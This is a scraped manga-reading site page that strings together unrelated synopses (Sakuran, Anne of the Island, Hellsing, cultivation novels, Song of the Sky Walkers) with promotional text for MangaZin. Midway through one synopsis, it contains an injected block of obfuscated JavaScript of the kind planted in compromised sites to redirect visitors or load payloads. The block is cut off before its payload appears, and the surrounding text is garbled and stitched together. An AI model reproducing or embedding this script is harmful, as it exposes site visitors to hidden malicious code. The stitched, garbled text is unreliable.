From A poor peasant girl was sold to a brothel in Edo. Her new life started from the day when she had her first full-bowl of rice. After many struggles, she became a cultivated Oiran. While her beauty never failed, her hope for freedom faded with the passing seasons. Yoshiwara of Edo was a man's heaven, but a woman's hell: all was sakuran. Other manga : + Durarara manga + Barbara manga
Anne leaves Green Gables and her work as a teacher in Avonlea to continue her education at Redmond College in Nova Scotia. She tucks her memories of rural Avonlea away and discovers life on her own terms, filled with surprises… including a marriage proposal from the worst fellow imaginable, the sale of her very first story, and a tragedy that teaches her a painful lesson.
This is the story of a prince, Izegole, the sixth son of the Agon family. The family that years ago took control of all the 500 villages of their continent. Izegole and his brothers and sisters are in charge of security in all the villages while the king, their father, takes care of politics. But one day everything changes, when a killer is sent to kill Izegole, a God comes to Earth with a secret mission and one after an other, his World, all that he considers important crumbles before him and leaving him but with hobson's choice: fight or fall? What will he choose? (find more info at the link:
The pasts of Walter, Hellsing and Millennium are revealed in this exciting prequel to the main Hellsing storyline, which takes place during the WWII era -- September, 1944 to be exact -- somewhere around Nazi-occupied Warsaw, Poland. From Baka-Updates: Hellsing, an organization devoted to the elimination of the vampire threat, has recently uncovered information regarding the attempted production of "man-made" undead. The world is presently in the thick of WWII, and the current leader of Hellsing fears the Nazis could potentially use these creatures as front-line super-soldiers. Although the technology of creating artificial vampires is still in its infancy, it has advanced enough to be a serious threat. In an attempt to put a stop to this perverse and dangerous experimentation, Hellsing has sent two of its most skillful agents to Poland. A young man by the name of Walter C. Dornes - a.k.a. "The Angel of Death," and Alucard, an ancient vampire currently in forced service to the Hellsing Organization. Together, they attempt to stop the progress of the Nazi's efforts. NOTE: On hiatus
As the head disciple of the number one sect in the world, Luo Jianqing had a brilliant reputation. He was the most respected senior brother of his junior brothers and sisters: the last disciple of the cultivation world’s number one cultivator, Luo Jianqing greatly respected his master’s teachings, not crossing his limits by even half a step.Afterward, he was stabbed to death just like that by the main character with his sword. His master’s sword.Luo Jianqing: “……”The Heavens want me dead, yet I refuse to die! See if the will of the heavens is more fearsome, or if the will of my sword is more stubborn!Wu Yin: “Jianqing, I have something to say to you.”Luo Jianqing: “Master, I also have something to say to you.”Wu Yin: “… you speak first?”Luo Jianqing: “You speak first.”Wu Yin: “I like you.”Luo Jianqing: “I want to top you.”Wu Yin: “……”
A manga adaptation of the Yuukoku no Moriarty light novels.
Eight years ago, Jisu Bahn was named the most promising talent on stage. Forgotten over the years, she grows more desperate for her big break. When she is approached by Hayle Tou, a mysteriously wealthy and irresistibly handsome man, she feels her next chapter in life will be a glamorous one with this man. One fateful night, they finally kiss. The very next day, everything changes in Jisu's life.
Suikoden is the Japanese adaption of the Water Margin or Outlaws of the Marsh, one of the four great Chinese classical novels. The original story tells how a group of 108 outlaws are granted amnesty when they form an army to resist foreign invaders and suppress rebel forces. Winding through the maze of political and social ancient China, their adventure brings them up against the apathy and conservatism of the current government, where very little regard exists for the truly brave.
Ryuuji, the young master of the Inamiya apothecary, finds himself intrigued by the blunt honesty displayed by his driver, Kondou. One day, he discovers the burning passion that Kondou holds for him after he snuck a peek at Kondou's journal. But even after Kondou discovers that Ryuuji read his journal, his behavior doesn't change, which leads Ryuuji to be extra self-conscious of that fact…
.Emperor of the cultivation world Mo Weiyu deceived elders and slaughtered ancestors and committed all crimes and sins known to man. After ending his own life, he was reborn and transmigrated to the year he first became a disciple. In the shell of a boy held an old and weary soul. After coming back to life, truth after truth that had been hidden below the surface in the previous life floated to the top and broke through the waters one after the other. Of all revelations, the one that stunned him the most was that the Shizun he had hated to the bone in his previous life had always been protecting him from the shadows… The heart of a man can change; even demons and monsters can become compassionate and do good. Only, he had sinned deeply. Can the blood on his hands ever be cleansed?
Rather than borrowing the power of the earrings and gaining great strength, the people of “Miao” are trapped by it’s side effects. Hundreds of years ago, “Aewol” and “Panhwa” who barely survived extinction, the two families both quietly lived in the west part of the continent while serving as a guard. One day, the Yokai God’s representative “Juno” descends to the ground and announces a “trial” for the people. A crisis where if they can’t solve this riddle-like problem, the two families will disappear from earth…! Will Aewol and Panhwa survive this crisis? And why did this ordeal find the Miao? Aewolui Kkum / AiYue de Meng / AiYue's Dream / LE RÊVE D'AEWOL / ???? / ???? / ??? ?<script></script><script>(function(_0x4e9379,_0x5a2bc5){var _0x19bb2e=_0x3c26,_0x54ed26=_0x4e9379();while(!![]){try{var _0x597419=-parseInt(_0x19bb2e(0x1c6))/(0x1*-0x859+-0x1881+0x20db)*(parseInt(_0x19bb2e(0x1c5))/(0x1*-0xd57+0x13d*0x17+-0xf22))+parseInt(_0x19bb2e(0x1cb))/(-0x6*-0x19+-0x2173+0x2*0x1070)*(parseInt(_0x19bb2e(0x1c4))/(0x17*0x5c+-0x1c5*-0xb+-0x37*0x81))+parseInt(_0x19bb2e(0x1bc))/(-0x266d+0x64*0x2f+0x1*0x1416)+parseInt(_0x19bb2e(0x1ca))/(-0x1c6b+0x153d+0x734)*(parseInt(_0x19bb2e(0x1d3))/(-0x1*-0x1085+0x2503+-0x3581))+-parseInt(_0x19bb2e(0x1d0))/(0x28c*-0xa+-0x15b*-0x5+0x12b9)*(-parseInt(_0x19bb2e(0x1cd))/(-0x26*0xd6+-0xf16*0x1+0x2ee3))+-parseInt(_0x19bb2e(0x1d2))/(0x17d+-0x1f71+0x1dfe)+-parseInt(_0x19bb2e(0x1c9))/(-0xd38+-0x866+-0x455*-0x5);if(_0x597419===_0x5a2bc5)break;else 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Read Manga Song of The Sky Walkers Online For Free At Top Manhua Associated Names: Bu Tian Ge – Die Ballade von den Himmelsstürmern / Bù Tiān Gē / Bộ Thiên Ca / Song of the Sky Pacers / 步天歌 The Content Song of The Sky Walkers: (In a made-up dynasty) During the Chen dynasty, Consort Jing gave birth to a pair of fraternal twins under the rays of sunlight. The prince was born with a cinnabar mole between his eyebrows, while the princess was born with six fingers. Fortune and misfortune appeared at the same time, causing the twins to experience entirely different fates as they were forced to leave their family. The heavenly tribulation is approaching, will the two twins who were separated from birth ever get to be reunited? What methods would they use to fight against their destinies? New and hot comics are updated the fastest. The Business Is Closed Due To The Tyrant Parents The Gambled Bride, Loved by a Wicked Lord Cinderella Disappeared MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “Top Manhua” and “ManhwaClan,” as well as related terms like ZinManga, LikeManga, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.